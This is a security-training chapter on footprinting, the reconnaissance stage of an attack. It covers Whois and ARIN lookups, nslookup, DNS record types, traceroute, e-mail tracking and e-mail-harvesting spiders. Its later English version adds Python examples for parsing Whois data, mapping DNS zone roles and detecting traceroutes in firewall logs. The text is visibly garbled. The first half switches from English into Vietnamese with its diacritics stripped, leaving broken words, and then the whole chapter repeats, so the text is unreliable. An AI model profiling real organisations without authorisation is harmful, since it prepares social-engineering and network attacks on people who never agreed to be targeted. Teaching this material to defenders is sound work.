Footprinting is defined as the process of creating a blueprint or map of an organization's network and systems. Information gathering is also known as footprinting an organization. Footprinting begins by determining the target system, application or physical location of the target. Once this is known, specific information about the organization is gathered using non-intrusive methods. For example, the organization's own web page may provide a staff directory or a list of employee bios, which can be useful if the hacker needs to use a social-engineering attack to reach the goal. A hacker may use Google search or Yahoo! People Search to locate information about employees. The Google search engine can be used in creative ways to perform information gathering; using the Google search engine to retrieve information is called Google hacking. http://groups.google.com can be used to search Google newsgroups. Blogs, newsgroups and the press are the best places to find information about a company or its employees. Job postings can provide information such as the kinds of servers or infrastructure devices a company is using. Other information obtained may include identification of the Internet technologies being used, the operating system and hardware in use, active IP addresses, e-mail addresses and phone numbers, and corporate policies and procedures.

Note: Typically, a hacker spends 90% of the time profiling and gathering information on a target and 10% of the time launching the attack.

2. Information-gathering methodology

Information gathering can be broken into the seven steps described in figure 2.1. The footprinting process is carried out during the first two steps: unearthing initial information and locating the network range.

Note: The other information-gathering steps are covered in Chapter 3, Scanning and Enumeration.

Some common sources used to gather information include the following:

Domain name lookup
Whois
Nslookup
Sam Spade

Figure 2.1: The seven steps of information gathering

Before we discuss these tools, keep in mind that open-source information can yield a wealth of information about a target, such as phone numbers and addresses. Performing Whois requests and searching Domain Name System (DNS) tables are other ways to gather it. Most of this information is easy to obtain and legal to obtain. Details of how DNS works and the specifics of DNS resolution are beyond the scope of this book and will not be discussed in detail; only the details most relevant to the information in this book are covered. It is recommended that all CEH candidates have an understanding of DNS and how name lookups work on the Internet.
Hacking tool

Sam Spade (http://www.samspade.org) is a website that contains a collection of tools such as Whois, nslookup and traceroute. Because they are located on a website, these tools work from any operating system and are a convenient source of information about a target organization.

3. Competitive intelligence


Competitive intelligence means gathering information about a competitor's products, marketing and technologies. Most competitive intelligence is non-intrusive toward the company being investigated and benign in nature; it is used to compare products or as a sales and marketing tactic to better understand how competitors position their products and services. Several tools exist for gathering competitive intelligence, and they can be used by hackers to gather information about a potential target.

4. DNS enumeration

Nslookup, DNSstuff, the American Registry for Internet Numbers (ARIN) and Whois can all be used to obtain the information that is then used to perform DNS enumeration.

Nslookup and DNSstuff


A powerful tool you should become familiar with is nslookup (see figure 2.2). This tool queries DNS servers for information. It is installed on Unix, Linux and Windows operating systems. The Sam Spade hacking tool also includes nslookup tools.

Figure 2.2: Nslookup

Besides the information gathered from Whois, you can use nslookup to find additional IP addresses for servers and other hosts. Using the authoritative name server from the Whois information (AUTH1.NS.NYI.NET), you can discover the IP address of the mail server. The proliferation of easy-to-use tools has made hacking really easy, provided you know which tools to use. DNSstuff is another of those tools. Instead of using the nslookup command-line tool with its cumbersome switches to gather DNS record information, just visit the website http://www.dnsstuff.com and you can do a DNS record search online. Figure 2.3 shows an example DNS record search for http://www.eccouncil.org using DNSstuff.com. The search reveals all the alias records for http://www.eccouncil.org and the IP address of the web server. You can even discover all the name servers and their associated IP addresses.

Note: The exploits available to you because you have this information are discussed in Chapter 4, System Hacking.

Figure 2.3: DNS record search for http://www.eccouncil.org

5. Whois and ARIN Lookups


Whois pht trin t h iu hnh Unix, nhng n by gi c th c tm thy trong nhiu h iu hnh khc nh trong hacking toolkits v trn Internet. Ngi xc nh cng c ny phi ng k tn min s dng cho email hoc website. Uniform Resource Locator (URL), v d www.Microsoft.com, cha tn min (Microsoft.com) v 1 tn host hoc b danh(www). Internet Corporation for Asigned Names and Numbers (ICANN) yu cu ng k tn min bo m rng ch c mt cng ty duy nht s dng tn min c th . Cng c Whois truy vn vic ng k c s d liu ly thng tin lin lc v c nhn hoc t chc ng k tn min .
Hacking tool

Whois thng minh l 1 chng trnh thu thp thng tin cho php bn tm tt c thng tin gi tr v mt a ch IP, host name, hoc domain, bao gm t nc, gm c lng, tnh, thnh ph, tn ca ngi cung cp mng, administrator, v h tr k thut a ch thng tin. Whois thng minh l 1 phin bn ha ca chng trnh Whois c s. ARIN l mt c s d liu ca thng tin bao gm nhng thng tin nh ch s hu ca a ch IP tnh. C s d liu ARIN c th c truy vn vic s dng cng c Whois, v d mt v tr ti http://www.arin.net/whois. Hnh 2.4 cho thy mt ARIN Whois tm kim n http://www.yahoo.com. Ch nhng a ch, nhng e-mail, v thng tin lin h c cha tt c trong kt qu tm kim Whois ny. Thng tin ny c th c s dng bi mt hacker o c, tm ra ngi chu trch nhim cho mt a ch IP nht nh v nhng t chc s hu mc tiu h thng, hoc c th c s dng bi mt hacker c hi, thc hin mt cuc tn cng k thut mang tnh t chc x hi ln na. Bn cn c nhn thc v thng tin c sn t do tm kim c s d liu ARIN v m bo mt hacker c hi khng th s dng thng tin ny khi ng mt cuc tn cng mng. Hnh 2.4 ARIN kt qu ra cho http://www.yahoo.com

Phn tch kt qu ca Whois


Mt cch thng thng chy chng trnh Whois l kt ni ti website (v d www.networksolutions.com) v tin hnh tm kim Whois. Sau y l kt qu ca tm kim Whois cho site www.eccouncil.org: Domain ID:D81180127-LROR Domain Name:ECCOUNCIL.ORG Created On:14-Dec-2001 10:13:06 UTC Last Updated On:19-Aug-2004 03:49:53 UTC Expiration Date:14-Dec-2006 10:13:06 UTC Sponsoring Registrar:Tucows Inc. (R11-LROR) Status:OK Registrant ID:tuTv2ItRZBMNd4lA Registrant Name: John Smith Registrant Organization:International Council of E-Commerce Consultants Registrant Street1:67 Wall Street, 22nd Floor

Registrant Street2: Registrant Street3: Registrant City:New York Registrant State/Province:NY Registrant Postal Code:10005-3198 Registrant Country:US Registrant Phone:+1.2127098253 Registrant Phone Ext.: Registrant FAX:+1.2129432300 Registrant FAX Ext.: Registrant Email:forum@eccouncil.org Admin ID:tus9DYvpp5mrbLNd Admin Name: Susan Johnson Admin Organization:International Council of E-Commerce Consultants Admin Street1:67 Wall Street, 22nd Floor Admin Street2: Admin Street3: Admin City:New York Admin State/Province:NY Admin Postal Code:10005-3198 Admin Country:US Admin Phone:+1.2127098253 Admin Phone Ext.: Admin FAX:+1.2129432300

Admin FAX Ext.: Admin Email:ethan@eccouncil.org Tech ID:tuE1cgAfi1VnFkpu Tech Name:Jacob Eckel Tech Organization:International Council of E-Commerce Consultants Tech Street1:67 Wall Street, 22nd Floor Tech Street2: Tech Street3: Tech City:New York Tech State/Province:NY Tech Postal Code:10005-3198 Tech Country:US Tech Phone:+1.2127098253 Tech Phone Ext.: Tech FAX:+1.2129432300 Tech FAX Ext.: Tech Email:forum@eccouncil.org Name Server: ns1.xyz.net Name Server: ns2.xyz.net Note: Nhng tn lin lc v tn server trong sch ny c thay i. Ch 4 dng c t m. u tin ch ra mc tiu cng ty hoc ngi (tt nh nhng a ch vt l ca h, a ch e-mail, s in thoi, v hn th). Tip theo ch ra administrator hoc technical contact ( v thng tin lin lc ca h). Hai dng in m cui cng cho thy nhng tn ca domain name servers.

6. Tm kim vng a ch mng (network address range)

Mi hacker cn hiu lm th no tm vng a ch mng v subnet mask ca h thng ch. a ch IP c s dng xc nh v tr, scan, v kt ni n h thng ch. Bn c th tm a ch IP ng k trn internet vi ARIN hoc vi IANA(Internet Asigned Numbers Authority). Hacker cng cn phi tm ra bng ng i ca h thng mng mc tiu. Nhim v ny c th thc hin bng cch gi nhng gi tin thm d (bng giao thc ICMP) n a ch IP ch. Bn c th s dng cng c nh Traceroute, VisualRouter v NeoTrace cho cng vic ny. Ngoi ra, khng ch c thng tin mng ch, nhng thng tin khc cng tr nn c gi tr. V d nhng nhng a ch m h thng mng ny va truyn nhn gi tin, a ch gatewayN s c tc dng trong mt tin trnh tn cng khc.

7. S khc bit ca cc loi bng ghi DNS (DNS Record)


Di y l cc loi bng ghi DNS m chng ta thng gp. Vic nghin cu n s gip chng ta phn bit r server m chng ta ang tm c chc nng g.

A (address): nh x hostname thnh a ch IP. SOA (Start of Authoriy): Xc nh bng ghi thng tin ca DNS Server. CNAME (canonical name): Cung cp nhng tn bit danh (alias) cho tn min ang c. MX (mail exchange): Xc nh mail server cho domain SRV (service): Xc nh nhng dch v nh nhng directory service PTR (pointer): nh x a ch ip thnh hostname NS (name server): Xc nh Name Server khc cho domain

8. S dng traceroute trong k thut FootPrinting


Traceroute l gi cng c c ci t sn trong hu ht cc h iu hnh. Chc nng ca n l gi mt gi tin ICME Echo n mi hop (router hoc gateway), cho n khi n c ch. Khi gi tin ICMP gi qua mi router, trng thi gian sng (Time To Live TTL) c tr i xung mt mc. Chng ta c th m c c bao nhiu Hop m gi tin ny i qua, tc l n c ch phi qua bao nhiu router. Ngoi ra, chng ta s thu c kt qua l nhng router m gi tin i qua. Mt vn ln khi s dng Traceroute l ht thi gian i (time out), khi gi tin i qua tng la hoc router c chc nng lc gi tin. Mc d tng la s chn ng vic gi tin ICMP i qua, nhng n vn gi cho hacker mt thng bo cho bit s hin din ny, k n vi k thut vt tng la c th c s dng. Note: nhng phng php k thut ny l phn ca tn cng h thng, chng ta s c tho lun trong chng 4: System hacking.

Sam Spade v nhiu cng c hack khc bao gm 1 phin bn ca traceroute. Nhng h iu hnh Window s dng c php tracert hostname xc nh mt traceroute. Hnh 2.5 l mt v d v traceroute hin th vic theo di theo www.yahoo.com Ch trong hnh 2.5, u tin s c mt qu trnh phn gii tn min tm kim a ch cho Yahoo Web Server, v a ch ip ca server c tm thy l 68.142.226.42. Bit a ch IP ny cho php hacker thc hin qu trnh qut ton b h thng phc v cho cng vic tn cng. Chng ta s tm hiu v cc cng ngh qut (Scan) trong chng tip theo. Hnh 2.5 Kt qu ca Traceroute cho www.yahoo.com
Hacking tools

Neo trace, Visualroute, v VisualLookout l nhng cng c c giao din ha thc hin chc nng Traceroute. S dng cng c ny chng ta c th xc nh v tr ca cc router v thit b mng khc. Ngoi ra, n cn xc nh nhiu thng tin tng hp khc. Chng cung cp mt giao din trc quan cho kt qu.

9. Theo di email (E-mail Tracking)


E-mailtracking l chng trnh cho php ngi gi bit c nhng vic lm ca ngi nhn nh reads, forwards, modifies, hay deletes. Hu ht cc chng trnh E-mailtracking hot ng ti server ca tn min email. Mt file ha n bit c s dng nh km vo email gi cho ngi nhn, nhng file ny s khng c c. Khi mt hnh ng tc ng vo email, file nh km s gi thng tin li cho server cho bit hnh ng ca server. Bn thng thy nhng file ny nh km vo email vi ci tn quen thuc nh noname, noread
Hacking tool

Emailtracking pro v mailtracking.com l nhng cng c gip hacker thc hin chc nng theo di email. Khi s dng cng c, tt c nhng hot ng nh gi mail, tr li, chuyn tip, sa mail u c gi n ngi qun l. Ngi gi s nhn c nhng thng bo ny mt cch t ng.

10.

Thu thp thng tin qua Web (Web Spiders)

Web Spoder l cng ngh thu thp nhng thng tin t internet. y l cch l spammer hoc bt ai quan tm n email dng thu thp danh sch email hu dng. Web Spider s dng nhng cu php, v d nh biu tng @, xc nh email hay, k n sao chp chng vo c s d liu. D liu ny c thu thp phc v cho mt mc ch khc. Hacker c th s dng Web Spider tng hp cc loi thng tin trn internet. C mt phng php ngn chn Spider l thm file robots.txt trong thc mc gc ca website vi ni dung l danh sch cc th mc cn s bo v. Bn s tm hiu ch ny trong phn ni v Web Hacking.
Hacking tool

1st email address spider v SpiderFoot l cng c cho php chng ta thu thp email t website theo nhng tn min khc nhau. Nhng spammer s dng cng c ny tin hnh thu thp hng lot email, phc v cho mc ch spam ca h.

11.

Tng Kt
Footprinting l k thut theo di thng tin ca mc tiu. N cn c thc hin trc tin trong qu trnh tn cng. Bn c th theo di i tng qua website ca cng ty, qua nhng thng tin c chia s trn mng. Thng tin ny c chia s cng khai, khng b rng buc v php lut. L qun tr vin, bn cn bit cn nhc trc nhng thng tin , thng tin no cn gi b mt S dng cc cng c theo di thng tin i tng nh Whois, Nslookup, Traceroute. Cc k thut theo di email, thu thp tin qua website cng nn bit.

Bn cn hiu r nhng ni dung nh sau:

<<<<<<<<<<<<<<<<<<Theo V Trung Kin>>>>>>>>>>>>>>>>>>>>>

CHAPTER 2: FOOTPRINTING
Vo Trung Kien

To begin attacking a system, you need to carry out three steps: footprinting, scanning, and enumeration. Before getting into the real work, you should have an overview of these tasks. Let us now look at the footprinting technique.

Consider a robber who wants to rob a bank. The robber cannot simply walk in and demand money; instead, the robber does everything possible to gather information about that bank. The information collected may include the route the armored truck takes, delivery times, the number of tellers, and anything else that helps the job succeed. The same requirement applies to an attacker on a network. The attacker must gather as much information as possible about every security aspect of the organization, and the result helps the attack go more smoothly. By following the footprints an organization leaves on the Internet (archives, remote access points, and its general Internet presence), an attacker can systematically collect information about it from many different sources.

What is footprinting?

Footprinting is part of the pre-attack preparation phase and involves accumulating data about a target's environment and architecture, usually with the aim of finding a way into that environment. Footprinting can reveal system vulnerabilities and show how easily they can be exploited. It is the easiest way for hackers to gather information about computer systems and the companies that own them. The purpose of this preparation phase is to learn as much as you can about a system, its remote access capabilities, its ports and services, and any specific aspects of its security.

1. Scope of Footprinting

Footprinting is defined as the process of creating a detailed plan or map of an organization's network. Gathering information in this way is known as footprinting the organization. Footprinting begins by identifying the target system, application, or physical location. Once that is known, specific information about the organization is gathered using non-intrusive methods. For example, the organization's own web page may provide a staff directory or a list of employee bios, which can be useful if the hacker needs to mount a social engineering attack to reach the goal. A hacker can use Google Search or Yahoo! People Search to locate information about employees. The Google search engine can be used creatively to gather information; using it this way is called Google hacking. http://groups.google.com can be used to search Google newsgroups. Blogs, newsgroups, and the press are the best places to look for company or employee information. Job postings can reveal the types of servers or infrastructure devices a company is using. Other information obtained may include which Internet technologies are in use, the operating systems and hardware in use, active IP addresses, e-mail addresses and phone numbers, and corporate policies and procedures.

Note: Typically, a hacker spends 90% of the time profiling and gathering information on a target and 10% of the time carrying out the attack.

2. Information-Gathering Methodology

Information gathering can be broken into seven steps, as depicted in Figure 2.1. The footprinting process is performed in the first two steps: unearthing initial information and locating the network range.

Note: The other information-gathering steps are covered in Chapter 3, Scanning and Enumeration.

Some common sources used to gather information include the following:

- Domain name lookup
- Whois
- Nslookup
- Sam Spade

Figure 2.1: The seven steps of information gathering

Before we discuss these tools, keep in mind that open-source information can yield a wealth of information about a target, such as phone numbers and addresses, through Whois queries and searches of Domain Name System (DNS) tables. Most of this information is easy and legal to obtain. How DNS works and the specifics of DNS name resolution are beyond the scope of this book and are not discussed in detail; only the details that matter for the information in this book are included. It is recommended that all CEH candidates have a working knowledge of DNS and how name resolution works on the Internet.
Hacking tool

Sam Spade (http://www.samspade.org) is a website that hosts a collection of tools such as Whois, nslookup, and traceroute. Because they are hosted on a single website, these tools work from any operating system and give one place to obtain information about a target organization.

3. Competitive Intelligence

Competitive intelligence means gathering information about a competitor's products, marketing, and technologies. Most competitive intelligence is non-intrusive to the company being investigated and benign in nature; it is used to compare products, or for sales and marketing tactics, to better understand how competitors are positioning their products and services. Several tools exist for the purpose of competitive intelligence gathering, and a hacker can use them to collect information about a potential target.

4. DNS Enumeration

Nslookup, DNSstuff, the American Registry for Internet Numbers (ARIN), and Whois can all be used to obtain information that is then used to perform DNS enumeration.

Nslookup and DNSstuff

A powerful tool you should be familiar with is nslookup (see Figure 2.2). It queries DNS servers for record information and is installed in Unix, Linux, and Windows operating systems. The Sam Spade hacking tool also includes nslookup tools.

Figure 2.2: Nslookup

In addition to the information gathered from Whois, you can use nslookup to find additional IP addresses for servers and other hosts. Using the authoritative name server information from Whois (AUTH1.NS.NYI.NET), you can discover the IP address of the mail server. The proliferation of easy-to-use tools makes hacking easy, if you know which tools to use. DNSstuff is another such tool. Instead of using the command-line nslookup tool with its cumbersome switches to gather DNS record information, just visit the website http://www.dnsstuff.com and you can do a DNS record search online. Figure 2.3 shows an example DNS record search on http://www.eccouncil.org using DNSstuff.com. This search reveals all the alias records for http://www.eccouncil.org and the IP address of the web server. You can even discover all the name servers and their associated IP addresses.

Note: The exploits available to you because you have this information are discussed in Chapter 4, System Hacking.

Figure 2.3: DNS record search for the address http://www.eccouncil.org

5. Whois and ARIN Lookups

Whois evolved from the Unix operating system, but it can now be found in many other operating systems as well as in hacking toolkits and on the Internet. This tool identifies who has registered the domain names used for e-mail or websites. A Uniform Resource Locator (URL), such as www.Microsoft.com, contains the domain name (Microsoft.com) and a hostname or alias (www). The Internet Corporation for Assigned Names and Numbers (ICANN) requires registration of domain names to ensure that only a single company uses a specific domain name. The Whois tool queries the registration database to retrieve contact information about the individual or organization that holds a domain registration.

Hacking tool

Smart Whois is an information-gathering program that lets you find all available information about an IP address, hostname, or domain, including country, state or province, city, name of the network provider, administrator, and technical support contact information. Smart Whois is a graphical version of the basic Whois program.

ARIN is a database of information such as the owners of static IP addresses. The ARIN database can be queried using the Whois tool, for instance the one located at http://www.arin.net/whois. Figure 2.4 shows an ARIN Whois search for http://www.yahoo.com. Notice that addresses, e-mails, and contact information are all contained in this Whois search result. This information can be used by an ethical hacker to find out who is responsible for a specific IP address and which organization owns the target system, or it can be used by a malicious hacker to perform a social engineering attack against the organization. You need to be aware of the information that is freely available in the ARIN database and make sure a malicious hacker cannot use it to launch an attack against the network.

Figure 2.4: ARIN output for http://www.yahoo.com

Analyzing Whois Output

A common way to run a Whois program is to connect to a website (for example, www.networksolutions.com) and conduct a Whois search. The following is the result of a Whois search for the site www.eccouncil.org:

    Domain ID:D81180127-LROR
    Domain Name:ECCOUNCIL.ORG
    Created On:14-Dec-2001 10:13:06 UTC
    Last Updated On:19-Aug-2004 03:49:53 UTC
    Expiration Date:14-Dec-2006 10:13:06 UTC
    Sponsoring Registrar:Tucows Inc. (R11-LROR)
    Status:OK
    Registrant ID:tuTv2ItRZBMNd4lA
    Registrant Name: John Smith
    Registrant Organization:International Council of E-Commerce Consultants
    Registrant Street1:67 Wall Street, 22nd Floor
    Registrant Street2:
    Registrant Street3:
    Registrant City:New York
    Registrant State/Province:NY
    Registrant Postal Code:10005-3198
    Registrant Country:US
    Registrant Phone:+1.2127098253
    Registrant Phone Ext.:
    Registrant FAX:+1.2129432300
    Registrant FAX Ext.:
    Registrant Email:forum@eccouncil.org
    Admin ID:tus9DYvpp5mrbLNd
    Admin Name: Susan Johnson
    Admin Organization:International Council of E-Commerce Consultants
    Admin Street1:67 Wall Street, 22nd Floor
    Admin Street2:
    Admin Street3:
    Admin City:New York
    Admin State/Province:NY
    Admin Postal Code:10005-3198
    Admin Country:US
    Admin Phone:+1.2127098253
    Admin Phone Ext.:
    Admin FAX:+1.2129432300
    Admin FAX Ext.:
    Admin Email:ethan@eccouncil.org
    Tech ID:tuE1cgAfi1VnFkpu
    Tech Name:Jacob Eckel
    Tech Organization:International Council of E-Commerce Consultants
    Tech Street1:67 Wall Street, 22nd Floor
    Tech Street2:
    Tech Street3:
    Tech City:New York
    Tech State/Province:NY
    Tech Postal Code:10005-3198
    Tech Country:US
    Tech Phone:+1.2127098253
    Tech Phone Ext.:
    Tech FAX:+1.2129432300
    Tech FAX Ext.:
    Tech Email:forum@eccouncil.org
    Name Server: ns1.xyz.net
    Name Server: ns2.xyz.net

Note: The contact names and server names in this book have been changed. Notice the four bold lines. The first shows the target company or person (as well as their physical address, e-mail address, phone number, and more). The next shows the administrator or technical contact (and their contact information). The last two bold lines show the names of the domain name servers.
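As an added example (not code from the book), the following Python parses a Whois listing like the one above into the domain fields, the per-role contact blocks, and the name servers, and then lists the identities a social engineer would harvest and the provider that hosts the zone's DNS. The embedded record is the page's own listing (with the book's altered names), trimmed to the fields that matter here, with one empty field kept to show how blanks are handled; the function and variable names are my own.

```python
from collections import defaultdict

# Whois listing quoted from the page (the book states contact and server names
# were changed), trimmed; "Registrant Street2:" is kept to show blank handling.
WHOIS_TEXT = """\
Domain ID:D81180127-LROR
Domain Name:ECCOUNCIL.ORG
Created On:14-Dec-2001 10:13:06 UTC
Last Updated On:19-Aug-2004 03:49:53 UTC
Expiration Date:14-Dec-2006 10:13:06 UTC
Sponsoring Registrar:Tucows Inc. (R11-LROR)
Status:OK
Registrant ID:tuTv2ItRZBMNd4lA
Registrant Name: John Smith
Registrant Organization:International Council of E-Commerce Consultants
Registrant Street1:67 Wall Street, 22nd Floor
Registrant Street2:
Registrant City:New York
Registrant State/Province:NY
Registrant Postal Code:10005-3198
Registrant Country:US
Registrant Phone:+1.2127098253
Registrant Email:forum@eccouncil.org
Admin Name: Susan Johnson
Admin Organization:International Council of E-Commerce Consultants
Admin Phone:+1.2127098253
Admin Email:ethan@eccouncil.org
Tech Name:Jacob Eckel
Tech Phone:+1.2127098253
Tech Email:forum@eccouncil.org
Name Server: ns1.xyz.net
Name Server: ns2.xyz.net
"""

ROLES = ("Registrant", "Admin", "Tech", "Billing")   # contact blocks a registry may list


def parse_whois(text):
    """Split a 'Key:Value' Whois listing into domain fields, contacts by role, name servers."""
    record = {"domain": {}, "contacts": defaultdict(dict), "name_servers": []}
    for line in text.splitlines():
        if ":" not in line:
            continue
        key, _, value = line.partition(":")
        key, value = key.strip(), value.strip()
        if not value:                      # blank fields such as "Registrant Street2:" carry nothing
            continue
        if key == "Name Server":
            record["name_servers"].append(value.lower())
            continue
        role = next((r for r in ROLES if key.startswith(r + " ")), None)
        if role:
            record["contacts"][role][key[len(role) + 1:]] = value
        else:
            record["domain"][key] = value
    record["contacts"] = dict(record["contacts"])
    return record


def exposed_identities(record):
    """(role, name, e-mail, phone) tuples: exactly what a social engineer would collect."""
    return [(role, f.get("Name"), f.get("Email"), f.get("Phone"))
            for role, f in record["contacts"].items()]


def dns_providers(record):
    """Parent domains of the name servers, i.e. who hosts the zone's DNS."""
    return sorted({".".join(ns.split(".")[-2:]) for ns in record["name_servers"]})


if __name__ == "__main__":
    rec = parse_whois(WHOIS_TEXT)
    for identity in exposed_identities(rec):
        print(identity)
    print("name servers:", rec["name_servers"], "hosted by", dns_providers(rec))
```

Run against your own domain's listing, the same functions show which role contacts expose personal names and direct phone numbers; many registrars let you replace those with role accounts or proxy contacts.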

6. Finding the Network Address Range

Every hacker needs to understand how to find the network address range and subnet mask of the target system. IP addresses are used to locate, scan, and connect to target systems. You can find the IP addresses registered on the Internet with ARIN or with IANA (Internet Assigned Numbers Authority).

A hacker also needs to work out the routing path to the target network. This can be done by sending probe packets (using the ICMP protocol) to the target IP address. You can use tools such as Traceroute, VisualRoute, and NeoTrace for this job. Beyond the target network's own details, other information also becomes valuable: for example, the addresses with which this network has just exchanged packets and the gateway address will be useful in a later stage of the attack.

7. The Different Types of DNS Records

Below are the DNS record types we commonly encounter. Studying them helps us tell what function a server we have found performs.

- A (address): maps a hostname to an IP address.
- SOA (Start of Authority): identifies the DNS server that holds the authoritative information for the zone.
- CNAME (canonical name): provides alias names for an existing domain name.
- MX (mail exchange): identifies the mail server for the domain.
- SRV (service): identifies services such as directory services.
- PTR (pointer): maps an IP address to a hostname.
- NS (name server): identifies other name servers for the domain.
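The roles listed above can be read off a zone mechanically. As an added example, not from the book, the following Python parses a small constructed BIND-style zone (the reserved documentation domain example.org with documentation-range addresses) and reports, for every host that has an A record, what the NS, SOA, MX, SRV and CNAME records say it does. The zone text and the function names are my own.

```python
# Constructed BIND-style zone for the reserved documentation domain example.org,
# using documentation address ranges; it is not a real zone.
ZONE_TEXT = """\
$ORIGIN example.org.
$TTL 3600
@            IN SOA   ns1.example.org. hostmaster.example.org. ( 2024010101 7200 900 1209600 3600 )
@            IN NS    ns1.example.org.
@            IN NS    ns2.example.org.
@            IN MX    10 mail.example.org.
@            IN MX    20 mail2.example.org.
@            IN A     192.0.2.10
www          IN A     192.0.2.10
mail         IN A     192.0.2.25
mail2        IN A     192.0.2.26
ns1          IN A     192.0.2.53
ns2          IN A     198.51.100.53
dc1          IN A     192.0.2.40
webmail      IN CNAME www.example.org.
_ldap._tcp   IN SRV   0 5 389 dc1.example.org.
"""

CLASSES = {"IN", "CH", "HS"}


def parse_zone(text):
    """Return {name, type, data} records with fully qualified owner names."""
    origin = "."
    records = []
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()      # drop comments and blank lines
        if not line:
            continue
        if line.startswith("$ORIGIN"):
            origin = line.split()[1]
            continue
        if line.startswith("$"):                  # $TTL and other directives
            continue
        tokens = line.replace("(", " ").replace(")", " ").split()
        name = tokens[0]
        if name == "@":
            name = origin
        elif not name.endswith("."):
            name = f"{name}.{origin}"
        i = 1
        while tokens[i].isdigit() or tokens[i] in CLASSES:   # optional TTL and class
            i += 1
        records.append({"name": name, "type": tokens[i], "data": tokens[i + 1:]})
    return records


def records_of_type(records, rtype):
    return [r for r in records if r["type"] == rtype]


def server_roles(records):
    """Map each host to (A address, sorted roles assigned to it by other records)."""
    addresses = {r["name"]: r["data"][0] for r in records_of_type(records, "A")}
    roles = {host: set() for host in addresses}

    def tag(host, role):
        roles.setdefault(host, set()).add(role)

    for r in records:
        t, d = r["type"], r["data"]
        if t == "NS":
            tag(d[0], "name server")
        elif t == "SOA":
            tag(d[0], "primary name server")
        elif t == "MX":
            tag(d[1], "mail exchanger")               # data is [priority, target]
        elif t == "SRV":
            service = ".".join(r["name"].split(".")[:2])   # e.g. _ldap._tcp
            tag(d[3], f"service {service}")           # data is [prio, weight, port, target]
        elif t == "CNAME":
            tag(d[0], f"alias {r['name']}")
    return {host: (addresses.get(host), sorted(r)) for host, r in roles.items()}


if __name__ == "__main__":
    for host, (addr, what) in server_roles(parse_zone(ZONE_TEXT)).items():
        print(f"{host:24} {addr or '-':16} {', '.join(what) or '(no role recorded)'}")
```

Reviewing your own zones this way shows what an outsider can infer from them: the SRV record above, for instance, advertises a directory service on dc1 before any port scan is run.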

8. Using Traceroute in Footprinting

Traceroute is a tool that comes preinstalled in most operating systems. Its function is to send an ICMP Echo packet to each hop (router or gateway) until the packet reaches the destination. As the ICMP packet passes through each router, the Time To Live (TTL) field is decremented by one. We can therefore count how many hops the packet passed through, that is, how many routers it crossed to reach the destination, and we also obtain the list of routers along the way. A big problem when using traceroute is timeouts, which occur when the packet passes through a firewall or a packet-filtering router. Although the firewall blocks the ICMP packet, the timeout still tells the hacker that the firewall is present, and firewall-evasion techniques can then be used.

Note: These evasion techniques are part of system attack and are discussed in Chapter 4: System Hacking.

Sam Spade and many other hacking tools include a version of traceroute. Windows operating systems use the syntax tracert hostname to perform a traceroute. Figure 2.5 is an example of traceroute showing a trace to www.yahoo.com. Notice in Figure 2.5 that a domain name lookup is performed first to find the address of the Yahoo web server, and the server's IP address is found to be 68.142.226.42. Knowing this IP address lets the hacker scan the whole system in preparation for the attack. We will study scanning techniques in the next chapter.

Figure 2.5: Traceroute output for www.yahoo.com

Hacking tools

NeoTrace, VisualRoute, and VisualLookout are graphical tools that perform the traceroute function. With them we can determine the location of routers and other network devices, and they identify much additional information. They present the results in a visual interface.
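From the defender's side, the TTL behaviour described above is also what makes a traceroute visible in firewall logs: one source sends probes whose TTL on arrival climbs one step at a time. As an added example, not from the book, the following Python runs that check over a few constructed iptables-style log lines (documentation addresses; field names and thresholds are my own assumptions). It treats ICMP echo requests and UDP datagrams to the traditional 33434-33534 probe port range as candidate probes and flags a source that shows at least three near-consecutive low TTL values within a minute.

```python
from collections import defaultdict
from datetime import datetime

# Constructed iptables-style log lines (documentation addresses, not real traffic).
FIREWALL_LOG = """\
Jan 10 10:00:01 fw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 LEN=60 TTL=1 PROTO=ICMP TYPE=8 CODE=0
Jan 10 10:00:01 fw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 LEN=60 TTL=2 PROTO=ICMP TYPE=8 CODE=0
Jan 10 10:00:02 fw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 LEN=60 TTL=3 PROTO=ICMP TYPE=8 CODE=0
Jan 10 10:00:02 fw kernel: IN=eth0 OUT= SRC=203.0.113.5 DST=192.0.2.10 LEN=60 TTL=4 PROTO=UDP SPT=40000 DPT=33437
Jan 10 10:00:05 fw kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 LEN=84 TTL=52 PROTO=ICMP TYPE=8 CODE=0
Jan 10 10:00:09 fw kernel: IN=eth0 OUT= SRC=198.51.100.7 DST=192.0.2.10 LEN=84 TTL=52 PROTO=ICMP TYPE=8 CODE=0
Jan 10 10:03:00 fw kernel: IN=eth0 OUT= SRC=198.51.100.9 DST=192.0.2.10 LEN=60 TTL=1 PROTO=TCP SPT=51000 DPT=80
"""


def parse_line(line):
    """Split a kernel/iptables log line into its timestamp and KEY=VALUE fields."""
    ts = datetime.strptime(line[:15], "%b %d %H:%M:%S")
    fields = {}
    for token in line[16:].split():
        if "=" in token:                      # bare flags such as DF have no value
            key, value = token.split("=", 1)
            fields[key] = value
    return ts, fields


def is_probe(fields):
    """ICMP echo request, or UDP to the port range classic traceroute uses."""
    if fields.get("PROTO") == "ICMP" and fields.get("TYPE") == "8":
        return True
    if fields.get("PROTO") == "UDP" and fields.get("DPT", "").isdigit():
        return 33434 <= int(fields["DPT"]) <= 33534
    return False


def detect_traceroute(log, window_s=60, min_hops=3, max_ttl=30):
    """Flag (src, dst) pairs whose probes show a climbing run of low TTLs within window_s."""
    by_pair = defaultdict(list)
    for line in log.splitlines():
        if not line.strip():
            continue
        ts, f = parse_line(line)
        if is_probe(f) and int(f["TTL"]) <= max_ttl:
            by_pair[(f["SRC"], f["DST"])].append((ts, int(f["TTL"])))
    hits = []
    for (src, dst), probes in by_pair.items():
        probes.sort()
        for i, (start, _) in enumerate(probes):
            in_window = [ttl for ts, ttl in probes[i:] if (ts - start).total_seconds() <= window_s]
            ttls = sorted(set(in_window))
            # a run like 1,2,3,4 (at most one gap) is a hop-by-hop trace, not random traffic
            if len(ttls) >= min_hops and ttls[-1] - ttls[0] <= len(ttls) + 1:
                hits.append({"src": src, "dst": dst, "ttls": ttls,
                             "first_seen": start.strftime("%b %d %H:%M:%S")})
                break
    return hits


if __name__ == "__main__":
    for hit in detect_traceroute(FIREWALL_LOG):
        print(hit)
```

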